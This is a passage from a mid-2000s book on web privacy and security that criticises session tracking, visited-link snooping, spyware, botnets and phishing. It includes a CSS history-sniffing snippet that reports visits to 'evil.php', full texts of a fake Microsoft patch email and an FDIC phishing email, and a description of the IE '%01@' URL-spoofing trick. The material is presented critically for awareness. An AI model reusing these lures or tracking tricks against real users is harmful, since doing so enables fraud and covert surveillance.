…in other words, to bypass the explicit efforts of users to preserve their privacy…
…developers should take these scenarios into consideration when building any cookie-based Web application.
To deal with a situation where cookies aren’t available, you must build a custom session handler to transfer session information back and forth between the browser and Web server…
Query String Approach
Using the query string approach, the cookie value is stored in the URL and can be retrieved by both the server and the browser. Here is an example of a session identifier embedded in a Java Server Pages URL:
http://www.yoursite.com/index.jhtml;jsessionid=Y1EF3PRPX44QICWLEALCFFA
The author then goes on to explain how to use hash values incorporating the session ID to prevent people from capturing the session ID. “People” in this case means hackers—but of course could also mean that pesky, nosy user trying to figure out what you’re doing with information about her. Hackers, users, what’s the difference…
Here’s another way—actually two ways—to get around user’s explicit decision not to be spied upon:
ASP.NET and Cookieless Sessions
For cookieless transactions in IIS4, you can use an ISAPI filter called Cookie Munger (ckymunge.dll) available in the Windows 2000 Server Resource Kit… ASP.NET has a built-in fallback mechanism to maintain cookieless sessions. IIS5 will do all the work of tracking the session information coming to and from the browser by automatically embedding the session identifier in all the relative links on your Web site. Here is an example of an ASP.NET URL implementing this feature:
http://www.myserver.com/(dvb4sd56h78f6t52vfd72v35)/Application/Webapp.aspx
But those annoying users can still come up with countermeasures…
The disadvantage of this approach is that if the user removes the session information in the URL, the session tracking will likely be lost. To deploy cookieless sessions in your ASP.NET application, all you need to do is reconfigure the cookieless variable in the config.Web file:
<configuration>
<system.Web>
<sessionstate cookieless=“true” />
</system.Web>
</configuration>
Or you can try “hidden forms.” Just as “persistent cookie” can be a misleading euphemism for “spy,” “hidden” in this case is a euphemism for “fake.”
Hidden Form Approach
The goal with the hidden form approach is to post a hidden value to the server every time a user navigates to a new page on your Web site. To make this work, every page on your site has to contain a form and an embedded hidden form field that looks something like this:
<input type=“hidden” name=“sessionid” value=“F0DS2AAGGDJBB5FSFJ32DFV”>
Then there’s the favorite tool of all sorts of snoopware authors, JavaScript (not to be confused—please!—with Java)
Parent Frame Approach
Our final approach uses JavaScript to retrieve a session ID stored in a hidden frame. The frameset code should be written like this:
<frameset rows=“100%,*” frameborder=“0” border=“0” framespacing=“0”>
<frame name=“main” src=“contentpage.asp” frameborder=“0” border=“0”>
<frame name=“session” src=“sessionid.asp” frameborder=“0” border=“0”>
</frameset>
In the hidden sessionid.asp file, all we need to do is populate a JavaScript variable (sessionIndentifier) with the value of the session identifier (SessionID):
<script language=“JavaScript”>
sessionIdentifier=“<%=Session.SessionID%>“;
</script>
In the visible frame, we can assign to sessionid the value of the sessionIdentifier variable located in the hidden frame:
<script language=“Javascript”>
var sessionid = parent.session.sessionIdentifier;
</script>
Still not enough tools for your espionage cabal? Here are a few that bypass the bypasses:
Alternative Solutions
The solutions we’ve looked at here cover conventional HTML-based technologies, but there are other ways of maintaining a session that extends beyond normal browser functionality. Here are a couple of these approaches.
XMLHTTP Approach
Using SOAP headers, it is possible to send and receive data, including session data. Edmond Woychowsky outlines some of the possibilities in his article “XMLHTTP ActiveX objects offer alternative to accessing ASP session variables.”
Java Approach
You can use Java applets to relay information back and forth between the server and the client without any browser intervention. Applets have no explicit support (or classes) for maintaining persistent states in the browser. However, applets can maintain a persistent state, create files, and read files on the server side. For the details, check the documentation for the Java2 Standard Edition Networking (java.net) package.
The article concludes with the inspiring admonition, in bold:
Persistence can pay off
We don’t need to play these games. The Personal Intellectual Property Infrastructure requires a site operator to display on a Web dialog a small, unobtrusive icon that signals what sort of personal information is being captured, and what provision in your Personal NDA makes that information capture legally permissible. You, as the author of your Personal NDA, can modify your it at any time to change the rules for access to your personal information.
Visited Links, or You Too Can Rule the World
It is widely known that FBI Director J. Edgar Hoover retained power through many decades spanning eight presidential administrations simply by accumulating large amounts of nosy personal information about what everybody in Washington was up to. In pre-Web days that took the efforts of hundreds of agents to accumulate that database, which Hoover wielded like a club to get his way.
Are songwriters Curt Smith and Roland Orzabal right when they suggest that Everybody Wants to Rule the World? Does everybody want to be a J. Edgar Hoover?
Do you?
Well then, you’ll find the familiar visited-link Web site methodology to be of useful service to your megalomaniac desires. You know, the technique that changes the color of a link to show that you have already visited the site or page or document or picture to which it connects.
Visited-link information can be gathered by parties other than the owners of the sites and documents to which they point. The estimable SitePoint Tech Times newsletter from Melbourne describes the trick nicely:
The author of the site wishing to find out your browsing habits places a link on his page:
<div id=“snoop”>
<a id=“examplelink”
href=“http://www.example.com/”>ex</a>
</div>
So that you don’t suspect anything, the CSS style sheet for the page hides the link:
#snoop {
display: none;
}
As you probably know, you can use CSS to assign a special style to a link that has already been visited. That style can include a background image for the link. To load that background image, the browser makes a request to the URL for the image.
Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:
#examplelink {
background-image: url(evil.php?user=123);
}
That script can then collect and store a list of all users who, in this case, have visited http://www.example.com/.
The attacking site can use information like this to display special content to visitors who visit particular sites, or, if you happen to log in and provide your personal details (say, to place an online order), they can discover exactly who’s visiting their competitors’ sites.
This has been a known bug in all browsers for years, and has been treated as a “moderate” vulnerability. That may be because developers of browser software tend to be happy with the craft of developing software and tend not to want to rule the world. They tend to see this as a privacy problem, a vulnerability that lets one or a few people snoop on acquaintances and colleagues.
They tend not to ask the question, “What if someone were to compile lists of visited links of every staff member supporting every person who appears to have political or governmental or managerial responsibility anywhere in the world? What if we were to then have an hourly report of deltas, for example, how and where has the attention of the staffs of the most influential people in the world changed in the last hour? What are they looking at?” Might they then be able to answer questions like, “Which merger candidate will win?” “How is Senator Jones likely to vote on this issue?” And finally, “How can we use this knowledge to influence the actual outcomes of these questions as well as other events, perhaps with the help of some Captology?”
So, Mr. Hoover-Wannabe, run out and get yourself a few terabytes of disk space (about $500 a terabyte), a nice 64-bit computer (motherboard with Athlon64, about $300) and a 64-bit database management system (free). It’ll all fit under your desk. Then start developing some scripts to harvest visited-link data from all over, and Buddy, you’ll be ruling the world in no time.
What’s that? Oh, very sorry sir. I mean Highness. No, Highness, I did not mean to call you Buddy.
Parasites
At least cookies regularly come under scrutiny. The fact that a lot of people know what’s going on in the world of cookies has made the abusers of cookie tools perhaps a little more discreet in the data gathering part of their intrusive activity, if not the data sharing part.
The propagators of parasites, on the other hand, have only recently begun to receive such scrutiny.
What is a parasite? It’s something that would be considered a virus if its propagators, having an economic motive, had not taken steps to make their viruses legal and thus not considered viruses by the vendors of virus protection software.
A parasite is a piece of code that gets embedded in your computer and reports to its propagator any information that it wants it to report. What sites have you visited to shop for books, software, cars, gifts; political sites, blogs and lifestyle sites; all email addresses in your address book, along with names—all can easily be reported back to the propagator of a parasite. Why bother with cookie files which, after all, everyone knows about and can easily detect on their computer. If your intentions are bad, why bother with the veneer of good intentions by messing with cookies? Just plant a parasite.
E-cards are a natural vehicle for parasites. People have learned to be wary of opening attachments that are the least bit suspicious, whereas e-cards evoke an emotional response that tends to displace caution. A mass mailing from cupid@valentines-ecard.com just before Valentine’s Day 2003 led many to open what turned out to be a commercial parasite that changed browser defaults and inserted at least one mysterious DLL into the user’s system. Soon someone will come up with a refined method of harvesting family and personal contacts from address books, making parasite e-cards quite indistinguishable from genuine ones.
The Doxdesk blog (www.doxdesk.com) provides a nice overview of the rapidly growing phenomenon, also known as spyware:
‘Parasite’ is a shorthand term for “unsolicited commercial software”—that is, a program that gets installed on your computer which you never asked for, and which does something you probably don’t want it to, for someone else’s profit. The parasite problem has grown enormously recently, and many millions of computers are affected. Unsolicited commercial software can typically:
- plague you with unwanted advertising (‘adware‘);
- watch everything you do on-line and send information back to marketing companies (‘spyware‘);
- add advertising links to web pages, for which the author does not get paid, and redirect the payments from affiliate-fee schemes to the makers of the software (such software is sometimes called ‘scumware‘);
- set browser home page and search settings to point to the makers’ sites (generally loaded with advertising), and prevent you changing it back (‘homepage hijackers‘);
- make your modem (analogue or ISDN) call premium-rate phone numbers (‘dialers‘);
- leave security holes allowing the makers of the software—or, in particularly bad cases, anyone at all—to download and run software on your machine;
- degrade system performance and cause errors thanks to being badly written;
- provide no uninstall feature, and put its code in unexpected and hidden places to make it difficult to remove.
You think that’s insidious? Try this. Some companies, anticipating that people will catch on and will search for parasite detection software, have already released such software. But it turns out that the software is a ruse—it actually plants parasites instead of removing them! Two of them identified by Doxdesk are:
TrekBlue offers a spyware remover called Spyware Nuker, which is being heavily advertised through junk e-mail from its ‘affiliates’. TrekBlue are the same company as e-mail marketers ‘TrekData’ and ‘Blue Haven Media’, who distribute spyware through ActiveX drive-by-download on web pages. They used to work for Lions Pride Enterprises, who made and control the ‘wnad’ spyware.
RedV offers an adware remover called AdProtector. However, the installer used to download this and the other RedV ‘Protector’ applications is itself adware, and RedV are the same company as Web3000, one of the early major spyware makers.
P2P and Open-Ended Tunnels
When we get to the prescriptive part of this book, the Instigations, we’ll be spend a lot of time discussing online spaces where members of groups can work together securely. All forms of online collaboration are growing tremendously in popularity. At the tuned-in consumer end of the collaborative spectrum we have the music-file-sharing networks such as KaZaA, while at the buttoned-down corporate end we have virtual private networks, or VPNs. VPNs provide “secure” tunnels, as impermeable to parasites and the like as are the walls of the Lincoln Tunnel that connects Manhattan with New Jersey. Your company’s precious information assets are well protected inside a VPN tunnel.
Not.
Tunnels allow employees to work with confidential company files remotely, as for instance from the computer in the employee’s den at home. Of course when mom isn’t using the computer to update her department’s budget, her kids are using it to steal, er, share music with other users of peer-to-peer networks like KaZaA.
My objective is to generate enthusiasm for online collaboration, and so my observations about this particular form of online collaboration, the wide-open file-swapping peer-to-peer worldwide rave gathering, has a particular urgency. Some of these things simply open your computer to the world. You are simply publishing everything to an audience that consists of everyone.
The spyware parasites themselves are bad enough. But what happens when you use that file-swapping P2P network on the computer that sits at the end point of the company tunnel, the super-secure VPN? Why, everything at the other end of that tunnel, that is, the company server, is published for the world as well! Companies assess risk partly according to the hacking skill level necessary to penetrate, but with this arrangement, why, no skill is required at all! The competition can just come in and help themselves to those departmental budgets.
Are You a Spammer’s Accomplice?
Parasites are planted in your computer for other purposes besides spying. A parasite can also turn your computer into a spam host. Who is sending those volumes of annoying pitches for Viagra and Low Low Mortgage Rates? It could be you!
In the first half of 2003, many in the security and ISP community began to suspect that personal computers were being hijacked and turned into generators of unwanted email. Then in June, MessageLabs, the provider of email management services to corporations around the world, found the proof. According to Britain’s VNUnet,
Spammers are increasingly hijacking home PCs to send junk mail, according to MessageLabs.
The managed email service provider claims to have proof of spammers using viruses to plant Trojan malware on PCs to provide remote access.
Once the software is installed the PC can be used to send out spam at no cost or risk to the spammer.
“We’d speculated for some time that this may be happening, but it’s always been difficult to prove,” said Paul Woods, chief information analyst at MessageLabs.
“This activity is hard to spot because spammers only send a few spam mails from each PC to avoid internet service providers realising what is going on.
“The number of unshielded PCs using ‘always on’ broadband connections has grown, and they are easy pickings for the spammers.”
Scant months after that discovery, the public Internet had deteriorated to the point where the phenomenon of home computers turned into zombie hosts was obvious not just to security researchers focused on the subject, but to everyone. By early 2004 a succession of worms began to appear that were not directly very threatening to those infected but that revealed some significant network-building intentions on the part of their authors.
On March 15, 2004, the Phatbot worm appeared, first reported by managed security services provider LURHQ. According to their bulletin ,
A kind of Darwinism pervades the world of trojan botnet development. With time, the more effective bots become increasingly popular, leading to additional development from secondary developers who provide “mods” to the bots. One very successful bot known as “Agobot” has now found itself superseded by “Phatbot”. Phatbot is actually a direct descendant of Agobot, with additional code rolled in from other sources. These additions have made Phatbot a more versatile and dangerous threat in the realm of Internet security. The analysis that follows attempts to detail the functionality of Phatbot for purposes of detection and elimination.
Phatbot has quite an extensive command list, much of which is derived from Agobot… What sets Phatbot apart from its predecessors is the use of P2P to control the botnet instead of IRC. Although Agobot has a rudimentary P2P system, IRC is still the main control vector. The author(s) of Phatbot chose to abandon Agobot’s IRC and P2P implementations altogether and replaced them with code from WASTE… [which] uses an encrypted P2P protocol designed for private messaging and file transfer between a small number of trusted parties…Since there is no central server in the WASTE network, the infected hosts also have to find each other somehow. This is accomplished by utilizing Gnutella cache servers—anyone can use the CGI scripts provided by these servers to register themselves as a Gnutella client. The Phatbot WASTE code registers itself with a list of URLs pretending to be a version of GNUT, a Gnutella client. Other Phatbot hosts then retrieve the list of Gnutella clients from these cache hosts using the same CGI scripts. The Phatbots differentiate themselves from the Gnutella clients by using TCP port 4387 instead of the standard Gnutella port.
WASTE was invented by Justin Frankel, who had earlier created the WinAMP music player. In 1999 AOL was attracted to the latter as a means to get their client software onto the music-download bandwagon, and so they purchased Frankel’s company Nullsoft, personally netting Frankel a reported one hundred million dollars. As part of the deal Frankel agreed to stay with AOL until a new version of WinAMP was finished.
Shortly after, AOL shocked the media world by purchasing Time Warner. Having spent time at the intersection of online services and magazine publishing, I know that if AOL’s Steve Case had turned red and sprouted horns and a barbed tail as the ink dried at the closing of that deal, many at Time Warner would have calmly turned to their colleagues muttering “told you so…”
Imagine then the amusement at Warner Music when their new fellow employee Justin Frankel subsequently released the P2P file sharing program Gnutella, powerfully improving upon the Napster idea. When AOLTW brass heard about Gnutella they immediately shut it down—or so they thought. Gnutella is completely P2P, with no central administration. Stephen Hawking and Marvin Minsky would probably consider it to be a form of life. When AOLTW eventually managed to slow the spread of the Gnut client and disrupt the operation of Gnutella, Justin Frankel further entertained his bosses by releasing WASTE, a P2P system where everything is transferred in encrypted form over AOL Instant Messenger and AOL ICQ. Justin Frankel finally left AOL in December 2003, after the company summarily pulled the plug on WASTE.
Some bosses just don’t appreciate hard work and creativity.
Spyware planted by piggybacking on existing P2P networks seemed like typical cookie club hijinks when it was first discovered and described. It looked like just another sleazy online marketing-espionage scheme, and it probably was. There’s no reason to believe that there is any organizational connection between those who first introduced these kinds of P2P tools and those who turned them into spam and spyware facilitators. More importantly, there is nothing that the inventor of these tools can do about their use. Picture a group of inventors and scientists manufacturing and distributing plutonium as a research material before its use in weapons was discovered. Now that the plutonium is out there, it’s not possible to bring it back. Gnutella and WASTE have very productive uses—and other uses. They’re apparently being taken to “the next level.”
That next level, which we have named Arpanet II, is a network on top of the Internet, VPN-style, a “network of (bot) networks” (that was the original definition of “an internet”) that appears to be attempting what the first Arpanet accomplished, that is, a network that will survive an attack by an enemy, one that will keep its effectiveness as nodes are taken out.
The enemy in this case is the provider of anti-virus tools, security services vendors, and their customers, e.g., you and me. Arpanet II is an attempt to gain control of the world’s information infrastructure.
What Is Arpanet II All About?
What’s the goal of the unknown sponsors of Arpanet II? Certainly they have more in mind than a platform for anonymously sending spam and pornography. That’s already been accomplished. Perhaps it’s the destruction of the world’s commercial, banking, and government infrastructures. Perhaps it’s complete control over information and communication channels into households. I guess we’ll find out soon enough.
As is the case with other infestations, eternal vigilance over spyware is not a sound, long term solution to the problem. As long as the space where we hang out is the “outdoor” Internet, where authentication is a hollow joke tossed around by copywriters to lull users into confidence, the propagators will always be one step ahead of even their most vigilant victims.
If constant vigilance is not your cup of tea, if your notion of fruitful use of the Internet is something other than spending all your time scanning for such garbage, monitoring intrusion detection systems, and tuning your firewall rules, then there is no hope at all for productive use of Internet time. Life on the public outdoor transport facility known as the Internet will always require constant vigilance.
That’s why you should consider moving to an indoor space. Stay tuned.
Web Bugs
We’re not done with insidiousness. Web bugs are another way for anyone—say some ex-convict working from a small office in a third-world city—to improve the local economic scene by selling information about you to companies that provide hard currency. This story is about an attempt to regulate (ha!) this particular practice of pilfering information about you a few bits at a time:
The Network Advertising Initiative, which comprises some of the internet’s leading advertising and ad technology companies, yesterday said it has finalized a set of best practices for the use of web bugs.
Web bugs, aka web beacons, are single-pixel GIF image tags in HTML documents used to track web users. The invisible bugs allow the page owner to measure user activity based on image server logs.
The NAI rules, which represent the industry’s attempt to self-regulate, ask companies using these techniques to provide a notice of web bug use that says what the bugs are used for and what data is transferred to third parties.
If the bug can be tied to personal data, such as via a cookie or an email address, and it will be disclosed to third parties, then there needs to be an opt-out for the user, but only when the disclosure is for purposes “unrelated” to the reason the data was collected.
Companies involved in the development of Web bug guidelines include IBM, Microsoft, the U.S. Postal Service, DoubleClick, WebSideStory, Advertising.com, 24/7 RealMedia, Coremetrics, KeyLime Software, and Guardent (as of February 2004 a unit of VeriSign).
Fortunately, Web bugs have been effectively blocked in many popular client programs.
Harvesting Your Information Residue
Cookies and Parasites aren’t the only source of information about you and where you’ve been and what you do on the Internet. Anonymizer.com notes that
Your IP address uniquely identifies your computer and is normally stored by every Web site you visit. This information can be bought and sold between Web sites and linked to your real world information to create a comprehensive profile of your personal data, including everywhere you surf.
The same site also notes that
In addition to cookies, websites are also allowed to store information in your browser cache. This means even if you delete your cookies, websites can get information back out of your cache. Now that you have seen what we can do with cookies, enter something to remember into the form below and click save. Then delete all your cookies. Then click “Retrieve Info”. We will be able to get the value back! You could even close your browser and restart and we will still get the value back! Until you clear your cache, we will have access to the info!
As long as you hang out outdoors, your life is visible to the whole world. Your equivalent in the physical world is the unfortunate family living in cardboard boxes under a bridge in the middle of the city or in the infamous Rocinha hillside favela in Rio.
Is that where you want to be? Doesn’t your family deserve better?
Barbarians at the Gate
Consider for a moment the possibilities of parasite software tools in the hands of unscrupulous mass marketers, thieves, power-hungry megalomaniacs, and other ambitious low life. When you think about what could be done to wreak utter havoc on society, you realize that havoc is as inevitable as was the inevitability of civil disorder in Iraq after the power structure was removed.
Will things get worse? Of course they will! Wherever and whenever society’s ability to enforce laws and keep order breaks down, the worst elements in society come out and claim control of the streets. We are surely headed for another Dark Ages if we keep dealing with these criminals and other dregs as though they were subject to the laws of some geographic jurisdiction, say, the U.S. They are taking over our personal computers. They are having a field day. And they’ve barely begun their exploits. Every misguided idea about controlling them using traditional methods not only leads to failure, it encourages them as they see that they are headed for victory, that is, control of all of our information and communication facilities, which of course implies control over our financial and governance facilities.
Parasites steadily become more effective, especially while our attention is distracted by the spam problem. The Sobig vandals of the first quarter of 2003 turned your computer into a spam host, relaying messages in such a way as to make their origin untraceable. You may have received one of the spam messages from the kidnapped personal computer of some unsuspecting neighbor in the global village, asking whether your computer has been running slow lately and suggesting you click and install their wonderful FREE software to, um, clear out the bad stuff and speed up the computer. What the software does, of course, is install the very parasitic software that slows the computer down as it gets busy with its new spamming chores. P.T. Barnum would have loved it!
Sobig was followed by Migmaf, which propagates in a similar manner but which augments the spamming duties of the zombie PC-turned-server: it adds the machine to a network of relays of pornographic content (I refuse to use the word “adult” in this context) whose origin, again, is completely untraceable.
Have you noticed how prescription drugs are now available without a prescription? As long as the source of a fraudulent prescription is traceable only to the broadband-connected personal computer of some unlucky family, then it’s easily done! Next of course will be illicit drugs. Get ready for mass-marketed Oxycontin. Get ready for a thriving market in personal secrets sold to shady divorce lawyers.
Fortunately Migmaf was not very skilled at getting past firewalls. Perhaps its authors guessed that consumers, who don’t have access to trained security people who can monitor their connections and watch for parasites, are a better target than organizations with the resources to try to track them down and prosecute them, or at least persecute them. That will of course change as the competing parasites saturate the home computer resource, forcing their perpetrators to use any of the many techniques for getting past firewalls. As the Aladdin Content Security Newsletter notes :
Although the scope of this latest infection is relatively small, experts warn that if this new trend continues and gathers momentum it may be harder and harder to stop; the key to tracking down and bringing the hacker to justice is the ability to back trace the culprit’s path to the location where the illegal activity originated from. By relaying information on a grand scale some hackers may, eventually, become completely and utterly untraceable.
Will the creators of Trojans like Migmaf become more skilled? Of course they will. Expect to see more stories like the following :
‘Trojan horse’ hacks into computer and ruins a life
One evening late in 2001, Julian Green’s seven-year-old daughter came out of the computer room of their home in Torquay, England, and said: “The home page has changed, and it’s not very nice.”
Mr Green found that the family PC seemed almost possessed. The internet home page had somehow been switched so that the computer displayed a child pornography site when the browser software started up. Even if he turned the machine off, it would turn itself back on and dial the internet on its own.
Mr Green called the computer maker and followed instructions to return his PC to a G-rated state. The porn went away, but the computer often crashed and kept connecting to the internet even when “there was no one in the blinking house”, he said.
But Mr Green’s problems were only beginning. Last October police searched his home and seized his computer. They found no sign of pornography in his home but discovered 172 images of child porn on the computer’s hard drive. They arrested Mr Green.
This month Mr Green was acquitted after arguing that the material had been gathered without his knowledge by a rogue hacker program—a so-called Trojan horse—that had infected his PC…
He was eventually exonerated, but his life has been turned upside down by the accusations. His ex-wife went to court soon after his arrest and gained custody of their youngest child and his house. Mr Green, who is disabled because of a degenerative disc disease, spent nine days in prison and three months in a “bail hostel”, or halfway house, and was allowed only supervised visits with his daughter.
“There’s some little sicko out there who’s doing this,” Mr Green said, “and he’s ruined my life. I’ve got to fight to get everything back.” He said he had no clue how the rogue software showed up on his computer. “I never download anything, and as far as I knew, no one had,” he said…
Things started turning around for Mr Green after the British press wrote about his acquittal, he said. One of the parents from his daughter’s school, who hadn’t spoken to him since the arrest, began talking to him the other day. “She must have said, ‘Perhaps he’s not a pervert after all’,” Mr Green said.
The story contains one important inaccuracy: Anti-virus software and programs will not ferret out and disable Trojans that may have been placed by a commercial enterprise. The obstacle is more legal than technical: vendors of anti-virus software are wary of litigation from pornographers and other commercial Trojan-planters who may be able to demonstrate some form of opt-in to get the material. Even if the opt-in was indirect, concealed, and gained from misleading offers, legally it counts. Mr. Green may have signed up for a healthcare newsletter and inadvertently consented to receive anything from the newsletter’s partners, and its partners’ partners, and its partners’ second cousins of golfing partners, and their parole officers’ partners…
Commenting on the Green case, David Sklar, coauthor of O’Reilly’s PHP Cookbook, notes the possibilities generated by the ability to plant targeted parasites:
It seems that to anyone familiar with the range of nastiness that a Trojan‘s capabilities encompass, depositing some child porn is a not-unexpected problem. Yet Julian Green fought an uphill battle to use this as a defense… a Trojan horse that is better at camouflaging itself than the investigator is at finding it… when combined with a targeted attack instead of random infection… would certainly make the accused’s pleas of “I’m innocent!” seem hollow. Child porn is good for discrediting political or business opponents; classified information for framing a government enemy; one criminal could use documents about entering the witness protection program to put false suspicion on another criminal…
Getting past a firewall is trivial if the Trojan is in an attachment to an email that uses advanced social engineering techniques. Even recipients who are trained to open attachments only from trusted sources will see an acquaintance’s email address in the “from” line of messages using those techniques.
Other new Trojan techniques don’t depend upon email at all. “Silver threading” is a sophisticated technique that inserts malicious code into normal application software. The significant competition in virus development kits means that anyone can take advantage of such techniques. Significantly, when those kits were first developed, there was no economic motive involved. No one had figured out how to make money with viruses; they were propagated only for sport. That was sufficient for what must have been some fairly dedicated development efforts, but now the spyware industry brings money to the table. Now your Trojans can be an army of dedicated employees, working around the clock for your clients in the fields of “legitimate” target marketing, pornography, international sex slavery, drugs, blackmail, “legal” research, and terrorism. None of the computer security profession’s existing products and approaches can do a thing to combat the next wave of parasitic software. Not even the eternal-vigilance approach of the top-notch managed security services providers, applied assiduously, will be able to stop this, or even slow it down.
It’s suggested that we limit all applications and system software to code that is digitally signed. (If you’re not acquainted with digital signatures, we will cover that in Part 3). Great idea—but who signs the code? Microsoft has had its executable code released to the public with digital signatures of impostors. As code signing becomes more and more commonplace, so will the opportunities for those with malice in mind to slip into the system and sign another company’s code. A small contract software development company might take some money on the side for slipping in a parasite or two that will do something on behalf of someone other than the main client.
Identity is the Foundation of Security. Identity does not mean the identity of the company, or the job title of whoever happens to have responsibility for a company’s code integrity at some random point in time. That company’s trucks are operated by drivers whose licenses identify the employee who is responsible for the safe operation of the vehicle. The job description and department are extraneous to the license certificate.
Identity means the irrefutable, authoritative identification of an individual human being.
“Cookieless data persistence is possible using these viable strategies,” by Jean-Luc David, builder.com, April 22, 2003.
“Editorial: A Subtle Privacy Issue” by Kevin Yank, SitePoint Tech Times, May 26, 2004.
“Spammers use Trojans to enslave home PCs” by Iain Thomson, VNUnet, June 6, 2003.
“Phatbot Trojan Analysis,” by LURHQ Threat Intelligence Group, www.lurhq.com/phatbot.html
“Web Bugs—Here Are the Rules,” Computer Business Review, November 27, 2002.
Aladdin Content Security Newsletter July 30, 2003.
“‘Trojan horse’ hacks into computer and ruins a life,” The Age, Melbourne, August 11, 2003.
O’Reilly Developer Weblogs, August 11, 2003.
Social Engineering Improves Too
| From: “MS Program Security Center” <jpzzkcvk@newsletters.msdn.com> To: “Commercial User” <user_ngxmlqgqiz@newsletters.msdn.com> |
All Products | Support | Search | Microsoft.com Guide |
Microsoft  |
Microsoft User: this is the latest version of security update, the “March 2004, Cumulative Patch” update which fixes all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express as well as three new vulnerabilities. Install now to protect your computer from these vulnerabilities, the most serious of which could allow an attacker to run code on your system. This update includes the functionality of all previously released patches. |
 System requirements |
Windows 95/98/Me/2000/NT/XP |
 This update applies to |
MS Internet Explorer, version 4.01 and later, MS Outlook, version 8.00 and later, MS Outlook Express, version 4.01 |
 Recommendation |
Customers should install the patch at the earliest opportunity. |
 How to install |
Run attached file. Choose Yes on displayed dialog box. |
 How to use |
You don’t need to do anything after installing this item. |
| Microsoft Product Support Services and Knowledge Base articles can be found on the Microsoft Technical Support web site. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site, or Contact Us. Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable to respond to any replies. | |
| Contact Us | Legal | TRUSTe | |
| ©2004 Microsoft Corporation. All rights reserved. Terms of Use | Privacy Statement | Accessibility | |
Does that message look familiar?
As you surely know by now, the message is bogus. Microsoft, Pacific Internet, and TRUSTe had nothing to do with it. The attachment is a worm.
When this and similar messages first appeared in mid-2003, however, a very large proportion of recipients, including technologically knowledgeable recipients, treated them as real. The perpetrators were clever enough to include valid hotlinks to Microsoft and TRUSTe. The wary, knowledgeable user rolls over the link and sees that it is legitimate.
Any user could be forgiven for coming to the conclusion that the messages are legitimate and opening the attachments. Even system administrators have been socially engineered, i.e. tricked, by such things even in 2006.
The perpetrators will get better at this. The only defense against this level of clever social engineering will be digital signatures from key pairs issued to individuals with identities established through the use of a strong face-to-face enrollment process.
Phishing for Dollars
The following message appeared in millions of mailboxes in early 2004:To whom it may concern;
In cooperation with the Department Of Homeland Security, Federal, State and Local Governments your account has been denied insurance from the Federal Deposit Insurance Corporation due to suspected violations of the Patriot Act. While we have only a limited amount of evidence gathered on your account at this time it is enough to suspect that currency violations may have occurred in your account and due to this activity we have withdrawn Federal Deposit Insurance on your account until we verify that your account has not been used in a violation of the Patriot Act.
As a result Department of Homeland Security Director Tom Ridge has advised the Federal Deposit Insurance Corporation to suspend all deposit insurance on your account until such time as we can verify your identity and your account information.
Please verify through our IDVerify below. This information will be checked against a federal government database for identity verification. This only takes up to a minute and when we have verified your identity you will be notified of said verification and all suspensions of insurance on your account will be lifted.
http://www.fdic.gov/idverify/cgi-bin/index.htm
Failure to use IDVerify below will cause all insurance for your account to be terminated and all records of your account history will be sent to the Federal Bureau of Investigation in Washington D.C. for analysis and verification. Failure to provide proper identity may also result in a visit from Local, State or Federal Government or Homeland Security Officials.
Thank you for your time and consideration in this matter.
Donald E. Powell
Chairman Emeritus FDIC
John D. Hawke, Jr.
Comptroller of the Currency
Michael E. Bartell
Chief Information Officer
All parts of the message look legitimate, including the Web address (URL) for the Federal Deposit Insurance Corporation. The request itself seems a bit odd, however, so you look up the advice of the security experts, who tell us to examine carefully the address that appears in the browser window that opens when we click on the address in the message. Clicking on the address in the message, you carefully examine the address that appears in your browser’s address window. Sure enough, it is www.fdic.gov, the legitimate, valid address of the Federal Deposit Insurance Corporation’s website. Feeling confident that you have protected yourself by observing the directions of the security experts, you go ahead and fill in the FDIC form, providing the information requested.
But the site is a fake! You’re giving your confidential banking information to a bunch of thieves!
How Did That Happen?
The site was built by simply copying the site files from www.fdic.gov, modifying them to include a form where you enter your name, bank account number, social security number, address, phone number, and any other details that the thieves might find useful, and then planting the modified files on a server that has nothing to do with the FDIC’s servers.Phishing is the odd name for one of the more effective techniques for committing fraud by means of social engineering. And a “vulnerability” in Windows Explorer makes it oh so easy. “Vulnerability” is in quotes because this particular idiosyncrasy was built into Explorer ostensibly to allow a username and password to be passed to a site through an invisible part of the URL in a kind of poor man’s single sign-on (SSO) scheme.
That particular “feature” of Explorer was well known. But as a perceptive vulnerability hunter known as Zap the Dingbat discovered in the last days of 2003:
By opening a specially crafted URL an attacker can open a page that appears to be from a different domain from the current location… By opening a window using the http://user@domain nomenclature an attacker can hide the real location of the page by including a non printing character (%01) before the “@”. Internet Explorer doesn’t display the rest of the URL making the page appear to be at a different domain.
Why does Explorer behave this way when a nonprinting character precedes the “@” in this special-case URL? Is it a genuine bug or is it a means to some purpose that we outside the Microsoft network of “partners” (as East Germany was a “partner” of the Soviet Union) can only imagine? Did someone in the Microsoft axis feel it would be useful to bring users to addresses that are not what they appear to be? Did they want to conceal their scheme for conveying state information via “legitimate” URLs—a legal but thoroughly manipulative version of the practice of phishing? Who knows. They never disclose these things, just as so many error messages never disclose the condition that made them appear. Microsoft is more than a company—it’s a bundle of hidden entangling alliances, with terms always dictated by Microsoft. We’ll never know what they’re doing with that lens through which passes an ever-increasing portion of our information and communications. “Features” we’re not told about, because they benefit partners instead of us hapless users, turn into vulnerabilities. We’re all picking cotton down on Microsoft’s plantation.
And so we have a steady stream of vulnerabilities, the latest of which—the clever little SSO-implementer built into Microsoft’s Internet Explorer—carries the flaw that makes it so much easier for thieves using phishing techniques to steal your money. That little trick with the @ sign in the URL, it turns out, was a bad idea. Worse, the vulnerabilities it introduces turn out to be difficult to fix, like those from other Windows design decisions. The window through which most of the world sees the Internet turns out to be a big vulnerability.
Regardless of the difficulty, vulnerabilities, once announced, must be fixed quickly. Certainly one expects a company as exposed as Microsoft and with the financial resources of Microsoft to respond very promptly. But in mid-January of 2004, users were still waiting, as illustrated in this story:
On a Microsoft security Webcast held Wednesday, participants were more interested in the whereabouts of a patch for a known Internet Explorer spoofing vulnerability than they were in the three new security bulletins that Microsoft released on Tuesday.
During the Webcast, Jeff Jones, senior director of Microsoft’s Trustworthy Computing initiative, told participants that Microsoft has been working on the IE patch since before Christmas, and it is done. But the testing is not completed for all the various versions of IE for different platforms and in all of the languages supported by Microsoft, he said.
By Microsoft Longhorn evangelist Robert Scoble’s count, there are more than 400 different IE iterations that need testing.
